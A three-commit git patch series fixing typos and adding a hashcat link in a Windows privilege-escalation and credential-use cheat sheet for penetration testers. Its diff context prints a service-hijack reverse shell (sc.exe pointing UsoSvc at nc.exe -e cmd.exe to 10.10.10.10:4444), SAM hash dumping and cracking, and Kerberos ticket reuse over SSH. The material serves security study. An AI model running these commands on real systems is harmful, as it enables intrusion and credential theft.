From 2ef501f883bccdd289bc1dc098b92573127180af Mon Sep 17 00:00:00 2001
From: NocFlame <aad@nocflame.se>
Date: Wed, 25 May 2022 09:55:05 +0200
Subject: [PATCH 1/3] replaced backslash with forwardslash in cmd syntax

As defined in cmd.exe /?
/C Carries out the command specified by string and then terminates
---
 Methodology and Resources/Windows - Privilege Escalation.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index e6273f0..ea5cc69 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -730,7 +730,7 @@ Prerequisite: Service account
 PS C:\Windows\system32> sc.exe stop UsoSvc
 PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
 PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
-PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
+PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
 PS C:\Windows\system32> sc.exe qc usosvc
 [SC] QueryServiceConfig SUCCESS
 
@@ -1494,4 +1494,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
 * [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/)
 * [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1)
 * [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
-* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)
\ No newline at end of file
+* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)

From ca959ec806359cb7252078ffe1d30022aa090fd5 Mon Sep 17 00:00:00 2001
From: NocFlame <aad@nocflame.se>
Date: Wed, 25 May 2022 10:04:41 +0200
Subject: [PATCH 2/3] Added missing parenthese

---
 Methodology and Resources/Windows - Using credentials.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md
index 784f411..c7a5b3c 100644
--- a/Methodology and Resources/Windows - Using credentials.md	
+++ b/Methodology and Resources/Windows - Using credentials.md	
@@ -328,7 +328,7 @@ klist
 
 ## SSH
 
-:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!
+:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!)
 
 ```ps1
 cp user.ccache /tmp/krb5cc_1045
@@ -339,4 +339,4 @@ ssh -o GSSAPIAuthentication=yes user@domain.local -vv
 
 - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
 - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
-- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
\ No newline at end of file
+- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)

From bebc87887ac6cacb31f79bf74407cdebe434be00 Mon Sep 17 00:00:00 2001
From: NocFlame <aad@nocflame.se>
Date: Wed, 25 May 2022 10:09:09 +0200
Subject: [PATCH 3/3] added link to hashcat

---
 Methodology and Resources/Windows - Privilege Escalation.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index ea5cc69..ffcc86b 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -394,7 +394,7 @@ pwdump SYSTEM SAM > /root/sam.txt
 samdump2 SYSTEM SAM -o sam.txt
 ```
 
-Either crack it with `john -format=NT /root/sam.txt` or use Pass-The-Hash.
+Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash.
 
 ### LAPS Settings